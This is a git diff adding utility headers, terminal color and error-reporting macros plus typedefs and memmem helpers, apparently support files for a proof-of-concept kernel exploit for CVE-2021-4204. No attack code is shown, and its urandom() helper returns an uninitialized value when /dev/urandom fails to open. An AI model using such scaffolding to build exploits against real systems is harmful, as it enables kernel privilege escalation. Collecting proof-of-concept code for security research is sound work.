"\x1b[0;37m" + #define cGRA "\x1b[1;90m" + #define cLRD "\x1b[1;91m" + #define cLGN "\x1b[1;92m" + #define cYEL "\x1b[1;93m" + #define cLBL "\x1b[1;94m" + #define cPIN "\x1b[1;95m" + #define cLCY "\x1b[1;96m" + #define cBRI "\x1b[1;97m" + #define cRST "\x1b[0m" + + #define bgBLK "\x1b[40m" + #define bgRED "\x1b[41m" + #define bgGRN "\x1b[42m" + #define bgBRN "\x1b[43m" + #define bgBLU "\x1b[44m" + #define bgMGN "\x1b[45m" + #define bgCYA "\x1b[46m" + #define bgLGR "\x1b[47m" + #define bgGRA "\x1b[100m" + #define bgLRD "\x1b[101m" + #define bgLGN "\x1b[102m" + #define bgYEL "\x1b[103m" + #define bgLBL "\x1b[104m" + #define bgPIN "\x1b[105m" + #define bgLCY "\x1b[106m" + #define bgBRI "\x1b[107m" + +#else + + #define cBLK "" + #define cRED "" + #define cGRN "" + #define cBRN "" + #define cBLU "" + #define cMGN "" + #define cCYA "" + #define cLGR "" + #define cGRA "" + #define cLRD "" + #define cLGN "" + #define cYEL "" + #define cLBL "" + #define cPIN "" + #define cLCY "" + #define cBRI "" + #define cRST "" + + #define bgBLK "" + #define bgRED "" + #define bgGRN "" + #define bgBRN "" + #define bgBLU "" + #define bgMGN "" + #define bgCYA "" + #define bgLGR "" + #define bgGRA "" + #define bgLRD "" + #define bgLGN "" + #define bgYEL "" + #define bgLBL "" + #define bgPIN "" + #define bgLCY "" + #define bgBRI "" + +#endif /* ^USE_COLOR */ + +/************************* + * Box drawing sequences * + *************************/ + +#ifdef FANCY_BOXES + + #define SET_G1 "\x1b)0" /* Set G1 for box drawing */ + #define RESET_G1 "\x1b)B" /* Reset G1 to ASCII */ + #define bSTART "\x0e" /* Enter G1 drawing mode */ + #define bSTOP "\x0f" /* Leave G1 drawing mode */ + #define bH "q" /* Horizontal line */ + #define bV "x" /* Vertical line */ + #define bLT "l" /* Left top corner */ + #define bRT "k" /* Right top corner */ + #define bLB "m" /* Left bottom corner */ + #define bRB "j" /* Right bottom corner */ + #define bX "n" /* Cross */ + #define bVR "t" /* Vertical, branch right */ + #define bVL "u" /* Vertical, branch left */ + #define bHT "v" /* Horizontal, branch top */ + #define bHB "w" /* Horizontal, branch bottom */ + +#else + + #define SET_G1 "" + #define RESET_G1 "" + #define bSTART "" + #define bSTOP "" + #define bH "-" + #define bV "|" + #define bLT "+" + #define bRT "+" + #define bLB "+" + #define bRB "+" + #define bX "+" + #define bVR "+" + #define bVL "+" + #define bHT "+" + #define bHB "+" + +#endif /* ^FANCY_BOXES */ + +/*********************** + * Misc terminal codes * + ***********************/ + +#define TERM_HOME "\x1b[H" +#define TERM_CLEAR TERM_HOME "\x1b[2J" +#define cEOL "\x1b[0K" +#define CURSOR_HIDE "\x1b[?25l" +#define CURSOR_SHOW "\x1b[?25h" + +/************************ + * Debug & error macros * + ************************/ + +/* Just print stuff to the appropriate stream. */ + +#ifdef MESSAGES_TO_STDOUT + #define SAYF(x...) printf(x) +#else + #define SAYF(x...) fprintf(stderr, x) +#endif /* ^MESSAGES_TO_STDOUT */ + +/* Show a prefixed warning. */ + +#define WARNF(x...) \ + do { if (verbose) { \ + \ + SAYF(cYEL "[!] " cBRI "WARNING: " cRST x); \ + SAYF(cRST "\n"); \ + \ + } } while (0) + +/* Show a prefixed "doing something" message. */ + +#define ACTF(x...) \ + do { if (verbose) { \ + \ + SAYF(cLBL "[*] " cRST x); \ + SAYF(cRST "\n"); \ + \ + } } while (0) + +/* Show a prefixed "success" message. */ + +#define OKF(x...) \ + do { \ + \ + SAYF(cLGN "[+] " cRST x); \ + SAYF(cRST "\n"); \ + \ + } while (0) + +/* Show a prefixed fatal error message (not used in afl). */ + +#define BADF(x...) \ + do { \ + \ + SAYF(cLRD "[-] " cRST x); \ + SAYF(cRST "\n"); \ + \ + } while (0) + +/* Die with a verbose non-OS fatal error message. */ + +#define FATAL(x...) \ + do { \ + \ + SAYF(bSTOP RESET_G1 CURSOR_SHOW cRST cLRD \ + "\n[-] PROGRAM ABORT : " cRST x); \ + SAYF(cLRD "\n Location : " cRST "%s(), %s:%u\n\n", __func__, \ + __FILE__, __LINE__); \ + exit(1); \ + \ + } while (0) + +/* Die by calling abort() to provide a core dump. */ + +#define ABORT(x...) \ + do { \ + \ + SAYF(bSTOP RESET_G1 CURSOR_SHOW cRST cLRD \ + "\n[-] PROGRAM ABORT : " cRST x); \ + SAYF(cLRD "\n Stop location : " cRST "%s(), %s:%u\n\n", __func__, \ + __FILE__, __LINE__); \ + abort(); \ + \ + } while (0) + +/* Die while also including the output of perror(). */ + +#define PFATAL(x...) \ + do { \ + \ + fflush(stdout); \ + SAYF(bSTOP RESET_G1 CURSOR_SHOW cRST cLRD \ + "\n[-] SYSTEM ERROR : " cRST x); \ + SAYF(cLRD "\n Stop location : " cRST "%s(), %s:%u\n", __func__, \ + __FILE__, __LINE__); \ + SAYF(cLRD " OS message : " cRST "%s\n", strerror(errno)); \ + exit(1); \ + \ + } while (0) + +/* Die with FATAL() or PFATAL() depending on the value of res (used to + interpret different failure modes for read(), write(), etc). */ + +#define RPFATAL(res, x...) \ + do { \ + \ + if (res < 0) \ + PFATAL(x); \ + else \ + FATAL(x); \ + \ + } while (0) + +/* Show a prefixed debug output. */ + +#define DEBUGF(x...) \ + do { if(verbose > 1) { \ + \ + SAYF(cMGN "[D] " cBRI "DEBUG: " cRST x); \ + SAYF(cRST "\n"); \ + \ + } } while (0) + +/* Error-checking versions of read() and write() that call RPFATAL() as + appropriate. */ + +#define ck_write(fd, buf, len, fn) \ + do { \ + \ + int _fd = (fd); \ + \ + s32 _len = (s32)(len); \ + s32 _res = write(_fd, (buf), _len); \ + if (_res != _len) RPFATAL(_res, "Short write to %s, fd %d", fn, _fd); \ + \ + } while (0) + +#define ck_read(fd, buf, len, fn) \ + do { \ + \ + s32 _len = (s32)(len); \ + s32 _res = read(fd, buf, _len); \ + if (_res != _len) RPFATAL(_res, "Short read from %s", fn); \ + \ + } while (0) + +#endif /* ! _HAVE_DEBUG_H */ \ No newline at end of file diff --git a/data/KernelPocs/CVE-2021-4204/include/helper.h b/data/KernelPocs/CVE-2021-4204/include/helper.h new file mode 100644 index 0000000..7186dcb --- /dev/null +++ b/data/KernelPocs/CVE-2021-4204/include/helper.h @@ -0,0 +1,90 @@ +#ifndef _HELPER_H_ +#define _HELPER_H_ + +#include +#include +#include +#include +#include +#include +#include + +typedef int8_t s8; +typedef int16_t s16; +typedef int32_t s32; +typedef int64_t s64; + +typedef uint8_t u8; +typedef uint16_t u16; +typedef uint32_t u32; +typedef uint64_t u64; + +typedef void* kaddr_t; + +#define U8_MAX ((u8)~0U) +#define S8_MAX ((s8)(U8_MAX >> 1)) +#define S8_MIN ((s8)(-S8_MAX - 1)) +#define U16_MAX ((u16)~0U) +#define S16_MAX ((s16)(U16_MAX >> 1)) +#define S16_MIN ((s16)(-S16_MAX - 1)) +#define U32_MAX ((u32)~0U) +#define S32_MAX ((s32)(U32_MAX >> 1)) +#define S32_MIN ((s32)(-S32_MAX - 1)) +#define U64_MAX ((u64)~0ULL) +#define S64_MAX ((s64)(U64_MAX >> 1)) +#define S64_MIN ((s64)(-S64_MAX - 1)) + +int urandom() +{ + int r; + int rand_fd = open("/dev/urandom", O_RDONLY); + if (rand_fd < 0) { + return r; + } + read(rand_fd, &r, sizeof(r)); + close(rand_fd); + return r; +} + +void *memmem(const void *haystack, size_t haystack_len, + const void *needle, size_t needle_len) +{ + const char *begin = haystack; + const char *last_possible = begin + haystack_len - needle_len; + const char *tail = needle; + char point; + + /* + * The first occurrence of the empty string is deemed to occur at + * the beginning of the string. + */ + if (needle_len == 0) + return (void *)begin; + + /* + * Sanity check, otherwise the loop might search through the whole + * memory. + */ + if (haystack_len < needle_len) + return NULL; + + point = *tail++; + for (; begin <= last_possible; begin++) { + if (*begin == point && !memcmp(begin + 1, tail, needle_len - 1)) + return (void *)begin; + } + + return NULL; +} + +int memoff(const void *haystack, size_t haystack_len, + const void *needle, size_t needle_len) +{ + void *found = memmem(haystack, haystack_len, needle, needle_len); + if (found) { + return (int)(found - haystack); + } + return -1; +} + +#endif /* _HELPER_H_ */ \ No newline at end of file